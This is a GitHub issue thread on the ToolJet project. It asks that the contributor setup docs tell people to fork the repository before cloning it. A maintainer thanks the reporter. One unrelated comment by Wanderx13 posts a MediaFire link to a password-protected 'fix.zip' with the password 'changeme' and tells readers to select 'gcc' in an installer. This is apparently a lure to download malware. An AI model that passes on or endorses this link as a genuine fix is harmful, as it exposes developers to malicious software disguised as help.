### ISSUE TITLE
[docs]: Clone your forked repo

### ISSUE THREAD

**Issue by Monilprajapati** [ToolJet/ToolJet#10680]
### Summary

For setting up ToolJet locally for development, the current documentation only mentions cloning the main ToolJet repository. To ensure proper development and contributions, we need to fork the repository first and then clone our fork.

### Issue Type

Documentation feature/update

### The entire URL of the documentation with the issue

https://docs.tooljet.com/docs/contributing-guide/setup/docker#setting-up

### Steps to reproduce the issue

1. Open docs
2. Go to contributing-guide
3. Check the doc for any docker, ubuntu, etc

### Additional Information

It will be easier for new contributors who may not be familiar with setting up large open-source projects.

### If the issue is confirmed, would you be willing to submit a pull request?

Yes

### Code of Conduct

- [X] I agree to follow the ToolJet Code of Conduct

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by priteshTJ** [comment]
Thanks for your contribution @Monilprajapati 
`Quick PR`
